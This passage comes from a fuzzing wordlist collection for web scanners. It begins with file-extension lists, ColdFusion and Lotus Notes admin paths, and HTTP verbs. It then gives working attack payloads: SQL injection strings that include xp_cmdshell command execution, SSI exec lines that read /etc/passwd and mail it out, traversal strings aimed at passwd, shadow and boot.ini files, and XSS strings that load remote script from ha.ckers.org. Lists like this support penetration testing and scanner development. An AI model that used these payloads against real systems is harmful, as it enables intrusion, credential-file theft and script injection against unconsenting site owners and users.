.rvt
.rwg
.rzb
.s85
.saf
.sam07
.sar
.sav
.sbd
.sbf
.sbq
.sbt
.sca
.scf
.sch
.sdb
.sdc
.sdf
.sdp
.sdq
.sds
.sen
.seo
.seq
.ser
.sgml
.sgn
.shp
.shs
.shx
.skc
.skv
.skx
.sle
.slk
.slp
.snapfireshow
.sonic
.soundpack
.spo
.sps
.spub
.spv
.sq
.sqd
.sql
.sqlite
.sqr
.sta
.stc
.stf
.stk
.stl
.stm
.stp
.str
.stt
.stw
.styk
.stykz
.swk
.sxc
.sxi
.sy3
.t01
.t02
.t03
.t04
.t05
.t06
.t07
.t08
.t09
.t2
.t3001
.tax2008
.tax2009
.tb
.tbk
.tbl
.tcc
.tcx
.tda
.tdl
.tdm
.tdt
.te
.te3
.teacher
.tef
.tet
.tfa
.tfd
.tfrd
.tjp
.tk3
.tkfl
.tmw
.tol
.topc
.tpb
.tps
.tr3
.tra
.trd
.trk
.trs
.trx
.tst
.tsv
.ttk
.txa
.txd
.txf
.uccapilog
.ud
.udb
.udeb
.uds
.ulf
.ulz
.update
.upoi
.usr
.uvf
.uwl
.val
.vbpf1
.vcd
.vce
.vcf
.vcs
.vdb
.vdx
.vfs
.vi
.vip
.vle
.vlg
.vmt
.voi
.vok
.vrd
.vscontent
.vsx
.vtx
.vxml
.w02
.wab
.wb1
.wb2
.wb3
.wdb
.wdq
.wea
.wfd
.wfm
.wgp
.wgt
.windowslivecontact
.wjr
.wk1
.wk2
.wk3
.wk4
.wk5
.wke
.wki
.wks
.wku
.wlmp
.wmdb
.wor
.wpc
.wpf
.wpo
.wq1
.wq2
.wtb
.wtr
.xbk
.xdb
.xdp
.xds
.xef
.xem
.xfd
.xfo
.xft
.xl
.xlc
.xlgc
.xlr
.xls
.xlsb
.xlsm
.xlsx
.xlt
.xltm
.xltx
.xlw
.xmcd
.xml
.xmlper
.xmpz
.xpg
.xpj
.xpm
.xpt
.xrp
.xsl
.xslt
.xsn
.xtm
.xtp
.xxd
.yam
.zap
.zdb
.zdc
.zix
.zmc
.zpl
.{pb
.~hm

Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)

#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)
# [email protected]
# creative commons

.0
.000
.7z
.a00
.a01
.a02
.ace
.ain
.alz
.apz
.ar
.arc
.arh
.ari
.arj
.ark
.axx
.b64
.ba
.bh
.boo
.bz
.bz2
.bzip
.bzip2
.c00
.c01
.c02
.car
.cb7
.cbr
.cbt
.cbz
.cp9
.cpgz
.cpt
.dar
.dd
.deb
.dgc
.dist
.ecs
.efw
.epi
.f
.fdp
.gca
.gz
.gzi
.gzip
.ha
.hbc
.hbc2
.hbe
.hki
.hki1
.hki2
.hki3
.hpk
.hyp
.ice
.ipg
.ipk
.ish
.j
.jar.pack
.jgz
.jic
.kgb
.lbr
.lemon
.lha
.lnx
.lqr
.lz
.lzh
.lzm
.lzma
.lzo
.lzx
.md
.mint
.mou
.mpkg
.mzp
.oar
.p7m
.pack.gz
.package
.pae
.pak
.paq6
.paq7
.paq8
.par
.par2
.pbi
.pcv
.pea
.pet
.pf
.pim
.pit
.piz
.pkg
.pup
.puz
.pwa
.qda
.r0
.r00
.r01
.r02
.r03
.r1
.r2
.r30
.rar
.rev
.rk
.rnc
.rp9
.rpm
.rte
.rz
.rzs
.s00
.s01
.s02
.s7z
.sar
.sdc
.sdn
.sea
.sen
.sfs
.sfx
.sh
.shar
.shk
.shr
.sit
.sitx
.spt
.sqx
.sqz
.tar
.tar.gz
.tar.xz
.taz
.tbz
.tbz2
.tg
.tgz
.tlz
.tlzma
.txz
.tz
.uc2
.uha
.vem
.vsi
.wad
.war
.wot
.xef
.xez
.xmcdz
.xpi
.xx
.xz
.y
.yz
.z
.z01
.z02
.z03
.z04
.zap
.zfsendtotarget
.zip
.zipx
.zix
.zoo
.zpi
.zz

Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)

# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)
# [email protected]
# creative commons

.3me
.3pe
.4dl
.8xk
.^^^
.aao
.ab2
.aca
.accdb
.acf
.acg
.agd
.an1
.anme
.arc
.arh
.ast
.att
.aw
.bafl
.bdf
.bfx
.bjo
.bld
.blg
.btf
.btif
.btr
.cct
.cdb
.cdd
.cdf
.cdp
.cdr
.chk
.ckd
.cl2
.cl4
.clb
.clix
.clm
.cmbl
.contact
.cpi
.cpmz
.csv
.cwz
.cxt
.daf
.dat
.data
.db
.dcf
.ddt
.dex
.dif
.dmsk
.dnc
.dpx
.dsd
.dt1
.dt2
.dta
.e00
.ec0
.edf
.eep
.efx
.enc
.enw
.epw
.est
.et
.eta
.ev3
.exif
.exp
.fbl
.fdb
.fid
.fol
.gdb
.gen
.gnp
.gpi
.gpx
.hcp
.hdf
.hmt
.hsk
.htg
.id2
.ii
.img
.ink
.ins
.irr
.irx
.iw
.jdb
.jnt
.job
.jrprint
.kmz
.lbx
.lex
.lgf
.lgl
.lib
.liveupdate
.lnt
.lst
.m
.masseffectprofile
.mat
.mbb
.mdb
.mem
.menc
.met
.mmf
.mng
.mpd
.mpp
.ms10
.muf
.mw
.mwf
.mwx
.nc
.ndx
.nfo
.not
.ns2
.ns3
.ns4
.ntx
.numbers
.ods
.oeaccount
.omcs
.or2
.or3
.or4
.or5
.orx
.out
.ov2
.ovf
.paf
.pbd
.pcr
.pdb
.pdx
.peb
.pec
.pfc
.pis
.pln
.pnpt
.pns
.pnt
.pos
.postal
.pps
.ppsx
.ppt
.pptm
.pptx
.pre
.prf
.psa
.psf
.pst
.ptz
.q07
.q3d
.qbw
.qdat
.qdf
.qfx
.qpf
.qpw
.qsd
.rcd
.rdx
.ref
.rmuf
.roi
.rrt
.rvt
.rwg
.saf
.sam07
.sbd
.sbf
.sbq
.sbt
.sdb
.sdc
.sdf
.sds
.ser
.sgn
.shs
.skc
.slk
.sonic
.soundpack
.spo
.sql
.stf
.stl
.stm
.sy3
.t08
.t09
.t2
.tax2009
.tdl
.tdt
.te
.teacher
.tmw
.tol
.trk
.trs
.trx
.tsv
.uccapilog
.ud
.udeb
.uds
.update
.uwl
.val
.vcf
.vdb
.vfs
.vip
.vle
.vlg
.vxml
.w02
.wab
.wb1
.wb3
.wdq
.wfd
.wfm
.windowslivecontact
.wk1
.wk2
.wk3
.wk4
.wk5
.wke
.wks
.wlmp
.wpc
.wpo
.wq1
.wq2
.wtr
.xbk
.xdb
.xds
.xfd
.xl
.xlgc
.xlr
.xls
.xlsx
.xltm
.xltx
.xml
.xmpz
.xsl
.xsn
.xtm
.xtp
.xxd
.{pb
.~hm

Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)

#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)
# [email protected]
# creative commons

CFIDE/Administrator/
CFIDE/Administrator/index.cfm
CFIDE/Administrator/login.cfm
CFIDE/Administrator/Application.cfm
CFIDE/Application.cfm
CFIDE/adminapi/
CFIDE/adminapi/Application.cfm
CFIDE/adminapi/administrator.cfc
CFIDE/adminapi/base.cfc
CFIDE/adminapi/customtags/
CFIDE/adminapi/customtags/l10n.cfm
CFIDE/adminapi/customtags/resources
CFIDE/adminapi/customtags/resources/
CFIDE/adminapi/datasource.cfc
CFIDE/adminapi/debugging.cfc
CFIDE/adminapi/eventgateway.cfc
CFIDE/adminapi/extensions.cfc
CFIDE/adminapi/mail.cfc
CFIDE/adminapi/runtime.cfc
CFIDE/adminapi/security.cfc
CFIDE/adminapi/_datasource/
CFIDE/adminapi/_datasource/formatjdbcurl.cfm
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm
CFIDE/adminapi/_datasource/geturldefaults.cfm
CFIDE/adminapi/_datasource/setdsn.cfm
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm
CFIDE/adminapi/_datasource/setsldatasource.cfm
CFIDE/classes/
CFIDE/classes/cf-j2re-win.cab
CFIDE/classes/cfapplets.jar
CFIDE/classes/images
CFIDE/componentutils/
CFIDE/componentutils/Application.cfm
CFIDE/componentutils/cfcexplorer.cfc
CFIDE/componentutils/cfcexplorer_utils.cfm
CFIDE/componentutils/componentdetail.cfm
CFIDE/componentutils/componentdoc.cfm
CFIDE/componentutils/componentlist.cfm
CFIDE/componentutils/gatewaymenu
CFIDE/componentutils/gatewaymenu/
CFIDE/componentutils/gatewaymenu/menu.cfc
CFIDE/componentutils/gatewaymenu/menunode.cfc
CFIDE/componentutils/login.cfm
CFIDE/componentutils/packagelist.cfm
CFIDE/componentutils/utils.cfc
CFIDE/componentutils/_component_cfcToHTML.cfm
CFIDE/componentutils/_component_cfcToMCDL.cfm?
CFIDE/componentutils/_component_style.cfm
CFIDE/componentutils/_component_utils.cfm
CFIDE/debug/
CFIDE/debug/images/
CFIDE/debug/includes/
CFIDE/images/
CFIDE/images/skins/
CFIDE/install.cfm
CFIDE/installers/
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp
CFIDE/installers/CFReportBuilderInstaller.exe
CFIDE/probe.cfm
CFIDE/scripts/
CFIDE/scripts/css/
CFIDE/scripts/xsl/
CFIDE/wizards/
CFIDE/wizards/common/
CFIDE/wizards/common/utils.cfc

All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)

#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)
# [email protected]
# creative commons

OPTIONS
GET
HEAD
POST
PUT
DELETE
TRACE
CONNECT
PROPFIND
PROPPATCH
MKCOL
COPY
MOVE
LOCK
UNLOCK
VERSION-CONTROL
REPORT
CHECKOUT
CHECKIN
UNCHECKOUT
MKWORKSPACE
UPDATE
LABEL
MERGE
BASELINE-CONTROL
MKACTIVITY
ORDERPATCH
ACL
PATCH
SEARCH
ARBITRARY

Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)

/852566C90012664F
/admin4.nsf
/admin5.nsf
/admin.nsf
/agentrunner.nsf
/alog.nsf
/a_domlog.nsf
/bookmark.nsf
/busytime.nsf
/catalog.nsf
/certa.nsf
/certlog.nsf
/certsrv.nsf
/chatlog.nsf
/clbusy.nsf
/cldbdir.nsf
/clusta4.nsf
/collect4.nsf
/da.nsf
/dba4.nsf
/dclf.nsf
/DEASAppDesign.nsf
/DEASLog01.nsf
/DEASLog02.nsf
/DEASLog03.nsf
/DEASLog04.nsf
/DEASLog05.nsf
/DEASLog.nsf
/decsadm.nsf
/decslog.nsf
/DEESAdmin.nsf
/dirassist.nsf
/doladmin.nsf
/domadmin.nsf
/domcfg.nsf
/domguide.nsf
/domlog.nsf
/dspug.nsf
/events4.nsf
/events5.nsf
/events.nsf
/event.nsf
/homepage.nsf
/iNotes/Forms5.nsf/$DefaultNav
/jotter.nsf
/leiadm.nsf
/leilog.nsf
/leivlt.nsf
/log4a.nsf
/log.nsf
/l_domlog.nsf
/mab.nsf
/mail10.box
/mail1.box
/mail2.box
/mail3.box
/mail4.box
/mail5.box
/mail6.box
/mail7.box
/mail8.box
/mail9.box
/mail.box
/msdwda.nsf
/mtatbls.nsf
/mtstore.nsf
/names.nsf
/nntppost.nsf
/nntp/nd000001.nsf
/nntp/nd000002.nsf
/nntp/nd000003.nsf
/ntsync45.nsf
/perweb.nsf
/qpadmin.nsf
/quickplace/quickplace/main.nsf
/reports.nsf
/sample/siregw46.nsf
/schema50.nsf
/setupweb.nsf
/setup.nsf
/smbcfg.nsf
/smconf.nsf
/smency.nsf
/smhelp.nsf
/smmsg.nsf
/smquar.nsf
/smsolar.nsf
/smtime.nsf
/smtpibwq.nsf
/smtpobwq.nsf
/smtp.box
/smtp.nsf
/smvlog.nsf
/srvnam.htm
/statmail.nsf
/statrep.nsf
/stauths.nsf
/stautht.nsf
/stconfig.nsf
/stconf.nsf
/stdnaset.nsf
/stdomino.nsf
/stlog.nsf
/streg.nsf
/stsrc.nsf
/userreg.nsf
/vpuserinfo.nsf
/webadmin.nsf
/web.nsf
/.nsf/../winnt/win.ini
/?Open 

SQL Injection -(Update: 11 August 2009 - Total Statements: 126)

Statement
'sqlvuln
'+sqlvuln
sqlvuln;
(sqlvuln)
a' or 1=1--
"a"" or 1=1--"
 or a = a
a' or 'a' = 'a
1 or 1=1
a' waitfor delay '0:0:10'--
1 waitfor delay '0:0:10'--
declare @q nvarchar (4000) select @q =
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
0
031003000270000
declare @s varchar(22) select @s =
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
exec(@s)
a'
?
' or 1=1
‘ or 1=1 --
x' AND userid IS NULL; --
x' AND email IS NULL; --
anything' OR 'x'='x
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND members.email IS NULL; --
x' OR full_name LIKE '%Bob%
23 OR 1=1
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'
'%20or%20''='
'%20or%20'x'='x
%20or%20x=x
')%20or%20('x'='x
0 or 1=1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
 or 0=0 #"
or 0=0 #
' or 1=1--
" or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
or%201=1
or%201=1 --
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
') or ('a'='a
) or (a=a
hi or a=a
hi or 1=1 --"
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
"hi"") or (""a""=""a"
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%;)(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
&apos;%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
a' or 3=3--
"a"" or 3=3--"
' or 3=3
‘ or 3=3 --

SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4)

# Some server side include statements
# Florian Roth @4nc4p

<!--#exec cmd="/bin/ls /" --><br/>
<!--#exec cmd="cat /etc/passwd" --><br/>
<!--#exec cmd="find / -name *.* -print" --><br/>
<!--#exec cmd="mail Florian Roth @4nc4p <mailto:Florian Roth @4nc4p> < cat /etc/passwd" --><br/>

Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)

Statement
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini

Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".

XSS Discovery Statements

Discovery Statements

# Discovery Statements (July 2007)
# Statements used to cause exploitable errors
# Florian Roth @4nc4p

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
'';!--"<XSS>=&{()}

Common exploit code

# Best Statements (July 2007)
# Statements covering 90% of all vulnerabilities 
# Florian Roth @4nc4p

'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));

Full List - (Update: 11 August 2009 - Total Statements: 162)

# Full List (July 2007)
# All Statements - Full List 
# Based on the XSS cheat sheet 
# http://ha.ckers.org/xss.html
# Florian Roth @4nc4p

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
"<IMG SRC=""javascript:alert('XSS');"">"
<IMG SRC=JaVaScRiPt:alert('XSS')>
"<IMG SRC=javascript:alert(""XSS"")>"
"<IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`>"
"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">"
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
"<IMG SRC=""jav"
"ascript:alert('XSS');"">"
"perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out"
"perl -e 'print ""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>"";' > out"
"<IMG SRC="" &#14;  javascript:alert('XSS');"">"
"<SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")>"
"<SCRIPT/SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<<SCRIPT>alert(""XSS"");//<</SCRIPT>"
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j>
"<IMG SRC=""javascript:alert('XSS')"""
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT>
"\"";alert('XSS');//"
